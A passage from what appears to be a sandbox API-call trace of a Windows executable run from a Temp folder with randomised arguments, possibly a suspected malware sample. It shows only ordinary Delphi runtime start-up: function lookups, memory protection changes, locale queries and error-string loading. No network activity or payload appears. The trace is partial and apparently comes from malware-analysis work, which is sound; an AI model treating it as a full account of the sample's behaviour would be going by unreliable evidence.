lpProcName="LoadStringW") returned 0x76b4dfba [0093.732] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0093.732] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0093.732] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0093.733] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0093.733] SetThreadLocale (Locale=0x400) returned 1 [0093.733] GetVersion () returned 0x1db10106 [0093.733] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.733] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0093.733] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.733] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0093.733] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.733] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0093.733] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0093.734] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.734] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0093.734] GetACP () returned 0x4e4 [0093.734] GetCurrentThreadId () returned 0xae8 [0093.734] GetVersion () returned 0x1db10106 [0093.734] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x261cb0, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.734] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.734] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.734] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x13c0000 [0093.734] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.734] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.735] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.735] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.735] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.735] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.735] GetUserDefaultUILanguage () returned 0x409 [0093.736] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0093.736] GetThreadUILanguage () returned 0x120409 [0093.736] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0093.736] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x14ea680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x14ea680, pcchLanguagesBuffer=0x12d768) returned 1 [0093.736] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.736] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.736] GetUserDefaultUILanguage () returned 0x409 [0093.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0093.736] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.737] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0093.738] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.738] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0093.738] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x274438 [0093.738] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0093.738] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0093.738] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0093.738] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.738] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.738] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.738] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x14b80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0093.738] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0093.738] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.738] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.738] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.739] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.739] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.739] GetThreadLocale () returned 0x409 [0093.739] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0093.739] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0093.739] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.739] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0093.739] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0093.739] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x274448 [0093.739] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0093.739] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0093.739] GetLastError () returned 0x7a [0093.739] GetLogicalProcessorInformation (in: Buffer=0x14a99d0, ReturnedLength=0x12fab0 | out: Buffer=0x14a99d0, ReturnedLength=0x12fab0) returned 1 [0093.739] GetCurrentThreadId () returned 0xae8 [0093.739] GetCurrentThreadId () returned 0xae8 [0093.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0093.739] GetThreadLocale () returned 0x409 [0093.739] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0093.740] GetThreadLocale () returned 0x409 [0093.740] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0093.740] GetCurrentThreadId () returned 0xae8 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0093.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.741] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0093.741] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0093.741] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0093.742] GetProcAddress (hModule=0x76c10000, 